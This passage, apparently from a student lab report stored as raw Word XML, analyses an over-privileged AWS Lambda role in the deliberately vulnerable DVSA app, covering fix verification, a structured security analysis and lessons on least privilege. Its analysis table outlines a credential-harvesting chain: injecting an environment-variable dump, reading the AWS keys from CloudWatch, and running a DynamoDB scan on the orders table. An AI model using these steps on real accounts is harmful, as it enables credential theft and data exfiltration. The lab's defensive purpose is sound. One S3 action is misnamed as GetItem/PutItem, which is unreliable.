                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC2D76A" w14:textId="318E9AA7" w:rsidR="001D3ABE" w:rsidRDefault="004F4317" w:rsidP="00CA734A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We did this fix because S3 and DynamoDB although they haven’t appear in CloudTrail, they are used in the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F399E" w14:textId="14A3882C" w:rsidR="004F4317" w:rsidRDefault="004F4317" w:rsidP="00CA734A">
      <w:r w:rsidRPr="004F4317">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60ABBB07" wp14:editId="74A826CB">
            <wp:extent cx="5943600" cy="2592705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179500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9255" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2592705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02996945" w14:textId="77777777" w:rsidR="004F4317" w:rsidRDefault="004F4317" w:rsidP="00CA734A"/>
    <w:p w14:paraId="634C8F15" w14:textId="0CE784F6" w:rsidR="00CA734A" w:rsidRDefault="00CA734A" w:rsidP="00CA734A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidRPr="00081012">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 8) Verification After Fix</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B277F2" w14:textId="541AEB17" w:rsidR="00DE3BE7" w:rsidRDefault="00DE3BE7" w:rsidP="00CA734A">
      <w:r>
        <w:t xml:space="preserve">Now, after </w:t>
      </w:r>
      <w:r w:rsidR="00870D26">
        <w:t>restricting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the privileges, the attacker no longer could do the scan command and others using the CLI</w:t>
      </w:r>
      <w:r w:rsidR="00870D26">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C4491C" w14:textId="5EAF090C" w:rsidR="00D12A8B" w:rsidRPr="00DE3BE7" w:rsidRDefault="00D12A8B" w:rsidP="00CA734A">
      <w:r w:rsidRPr="00D12A8B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BFAF888" wp14:editId="1025AC92">
            <wp:extent cx="5943600" cy="259080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="157711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18504" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="259080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6912C16D" w14:textId="163C1265" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="4469DBC7" w14:textId="77777777" w:rsidR="00034196" w:rsidRDefault="00034196" w:rsidP="00034196">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502FC6EB" w14:textId="77777777" w:rsidR="004028B0" w:rsidRDefault="004028B0" w:rsidP="004028B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004028B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 9) Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93961F" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Intended Logic and Security Rule(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF2E80C" w14:textId="39DF446D" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="0074032D">
      <w:r w:rsidRPr="00EF13BF">
        <w:t>The DVSA-SEND-RECEIPT-EMAIL Lambda is triggered after a successful order to send a confirmation email via SES. The main actor is the Lambda runtime, authenticated automatically via its IAM execution role</w:t>
      </w:r>
      <w:r w:rsidR="0074032D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:t xml:space="preserve">The AWS services legitimately needed by the function are: </w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S3</w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:t xml:space="preserve"> (s3:GetObject and s3:PutObject scoped to the receipt bucket — to download the raw file and upload the processed .txt receipt),</w:t>
      </w:r>
      <w:r w:rsidR="0074032D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DynamoDB </w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:t>dynamodb:GetItem</w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0074032D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SES</w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:t xml:space="preserve"> (ses:SendEmail scoped to the verified sender — to email the customer), </w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>STS</w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:t xml:space="preserve"> (sts:GetCallerIdentity — to construct the secmail address), </w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CloudWatch Logs</w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KMS</w:t>
      </w:r>
      <w:r w:rsidR="0074032D" w:rsidRPr="0074032D">
        <w:t xml:space="preserve"> (for execution logging). The role should grant exactly these permissions against specific resource ARNs — nothing more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BCE476" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security Rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09953D04" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A Lambda execution role must grant only the minimum permissions required for the function's stated business logic (principle of least privilege).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E003D" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Wildcard resource ARNs (*) must never be used in production IAM policies when specific resource ARNs are known.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BED5E" w14:textId="41C9E55F" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF"/>
    <w:p w14:paraId="00EDF463" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Evidence Sources and Behavior Trace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C52726" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Artifacts used:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF13BF">
        <w:t xml:space="preserve"> IAM role policy inspection (AWS Console), IAM Policy Simulator (simulated blast-radius actions), CloudTrail-generated least-privilege policy (actual runtime permissions), CloudWatch Logs (invocation records), CloudShell terminal output (credential harvesting and dynamodb:Scan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8207"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w14:paraId="6157E223" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D7BA495" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF13BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B65F440" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF13BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Observed Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w14:paraId="409F932B" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="038B3CF9" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
            <w:r w:rsidRPr="00EF13BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Normal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FAED149" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
            <w:r w:rsidRPr="00EF13BF">
              <w:t>Function triggers on S3 upload event → sends receipt email via SES → writes execution log to CloudWatch. CloudTrail records only: logs:CreateLogStream, kms:Decrypt, sts:GetCallerIdentity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w14:paraId="18645E77" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44DDB48F" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
            <w:r w:rsidRPr="00EF13BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0864A6EC" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
            <w:r w:rsidRPr="00EF13BF">
              <w:t xml:space="preserve">Attacker injects print(dict(os.environ)) into the function code → triggers execution via aws s3 cp → harvests AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN from CloudWatch → exports credentials → runs aws dynamodb scan --table-name DVSA-ORDERS-DB → full table contents returned. IAM Policy Simulator also confirms s3:GetObject, s3:PutObject, dynamodb:Scan, dynamodb:DeleteItem all </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF13BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Allowed</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF13BF">
              <w:t xml:space="preserve"> against wildcard ARNs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w14:paraId="1B0C25A1" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D88AD95" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
            <w:r w:rsidRPr="00EF13BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Post-fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F78095D" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00143850" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00174FC4">
              <w:t>S3 resource ARN restricted to specific receipt bucket only. DynamoDB ARN restricted to specific table with GetItem only. AmazonSESFullAccess replaced with ses:SendEmail scoped to verified sender. Running dynamodb:Scan with harvested credentials now returns AccessDeniedException.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C0C5A18" w14:textId="797149D3" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF"/>
    <w:p w14:paraId="40E924EF" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Deviation Analysis and Classification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3AB2F9" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:r w:rsidRPr="00EF13BF">
        <w:t xml:space="preserve">The exploit violates the least-privilege rule because the role grants S3 and DynamoDB permissions that are structurally unrelated to sending a receipt email. The IAM Policy Simulator proves that the role can Scan, PutItem, and DeleteItem against any DynamoDB </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF13BF">
        <w:lastRenderedPageBreak/>
        <w:t>table, and read/write any S3 object in the account. The CloudTrail-generated policy proves that in actual runtime the function uses only three permissions — making the gap between declared and used permissions undeniable. The credential harvesting attack required no special access: any code injected into the Lambda function automatically inherits the full role, giving an attacker account-wide data access through a single compromised function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F0E59B" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deviation Class: Accidental misconfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF13BF">
        <w:t xml:space="preserve"> — over-broad managed policies and wildcard ARNs were attached for convenience and never scoped down before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A53B69" w14:textId="0A2A0C1B" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF"/>
    <w:p w14:paraId="4EE4E54A" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Explainable Fix and Post-Fix Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D1FED" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wrong assumption:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF13BF">
        <w:t xml:space="preserve"> That attaching broad managed policies like AmazonSESFullAccess and wildcard resource ARNs is harmless because the function "probably won't use" the extra permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE8AFB" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where the fix belongs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF13BF">
        <w:t xml:space="preserve"> IAM — the inline and managed policies attached to SendReceiptFunctionRole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526AEC0" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exact changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AE758" w14:textId="4FBE9157" w:rsidR="00EF13BF" w:rsidRPr="005C5F5A" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5F5A">
        <w:t>S3 policy: resource ARN restricted from arn:aws:s3:::*/* to the specific receipt bucket ARN only</w:t>
      </w:r>
      <w:r w:rsidR="000D6833">
        <w:t>, with actions narrowed to GetItem and PutItem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555A14E0" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="005C5F5A" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5F5A">
        <w:t>DynamoDB policy: resource ARN restricted from arn:aws:dynamodb:REGION:ACCOUNT:table/* to the specific table, with actions narrowed to GetItem only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDFC397" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF13BF">
        <w:t>SES policy: AmazonSESFullAccess removed and replaced with a custom policy scoped to ses:SendEmail for the verified sender identity only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F7F7A" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="00EF13BF">
      <w:r w:rsidRPr="00EF13BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-fix confirmation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF13BF">
        <w:t xml:space="preserve"> Running aws dynamodb scan with the harvested credentials returns AccessDeniedException. The receipt email workflow continues to function correctly, confirming legitimate behavior is preserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E2676" w14:textId="77777777" w:rsidR="00EF13BF" w:rsidRPr="00EF13BF" w:rsidRDefault="00EF13BF" w:rsidP="004028B0"/>
    <w:p w14:paraId="10C0172F" w14:textId="77777777" w:rsidR="002B3D94" w:rsidRPr="004028B0" w:rsidRDefault="002B3D94" w:rsidP="004028B0"/>
    <w:p w14:paraId="61F5BADB" w14:textId="77777777" w:rsidR="004028B0" w:rsidRPr="00034196" w:rsidRDefault="004028B0" w:rsidP="004028B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00034196">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Standard Summary Table Template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A3EFA1" w14:textId="77777777" w:rsidR="00872BC5" w:rsidRDefault="00872BC5"/>
    <w:p w14:paraId="547D9051" w14:textId="3C1A31C8" w:rsidR="00872BC5" w:rsidRDefault="00980274">
      <w:r w:rsidRPr="00980274">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F4AACF" wp14:editId="1798589B">
            <wp:extent cx="5943600" cy="2818765"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="127349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1914" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2818765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4839DE" w14:textId="5C26A435" w:rsidR="001D3ABE" w:rsidRDefault="00980274">
      <w:r w:rsidRPr="00980274">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51765B45" wp14:editId="03B84A00">
            <wp:extent cx="5943600" cy="4396105"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="17266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781" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4396105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E4E220" w14:textId="1C15E05F" w:rsidR="00872BC5" w:rsidRDefault="00872BC5"/>
    <w:p w14:paraId="37368F21" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="55D6AD96" w14:textId="03FE8493" w:rsidR="007113B3" w:rsidRPr="007113B3" w:rsidRDefault="007113B3" w:rsidP="007113B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007113B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part 10) Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F8DD7" w14:textId="77777777" w:rsidR="00F15137" w:rsidRPr="00F15137" w:rsidRDefault="00F15137" w:rsidP="00F15137">
      <w:r w:rsidRPr="00F15137">
        <w:t>The core flawed assumption was that attaching broad managed policies like AmazonSESFullAccess and wildcard ARNs is harmless as long as the function's own code never calls those extra services. This assumption fails completely once the attacker controls what code runs inside the function — whether through injection, a supply-chain compromise, or a misconfigured trigger. At that point, the function's code is irrelevant; the IAM role is the only access boundary that matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53315F53" w14:textId="77777777" w:rsidR="00F15137" w:rsidRPr="00F15137" w:rsidRDefault="00F15137" w:rsidP="00F15137">
      <w:r w:rsidRPr="00F15137">
        <w:t>In a serverless environment this risk is structurally higher than in traditional systems. There is no OS-level process boundary, no network firewall, and no persistent state to contain a compromise. The Lambda execution role is the entire security perimeter. A single over-privileged function can therefore become a pivot point into every other AWS service in the account — S3, DynamoDB, SES, and beyond — without any lateral movement required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822D469" w14:textId="77777777" w:rsidR="00F15137" w:rsidRPr="00F15137" w:rsidRDefault="00F15137" w:rsidP="00F15137">
      <w:r w:rsidRPr="00F15137">
        <w:t xml:space="preserve">The general principle is </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15137">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>derive permissions from observed runtime behaviour, not from assumptions about what the function might need.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15137">
        <w:t xml:space="preserve"> AWS provides the exact tools to do this correctly: trigger the function, capture its real API calls in CloudTrail, and use IAM Access Analyzer or the CloudTrail-generated policy feature to produce a minimum viable policy. If you do this first and attach the result, wildcard ARNs and unused managed policies never appear in the first place.</w:t>
      </w:r>
    </w:p>
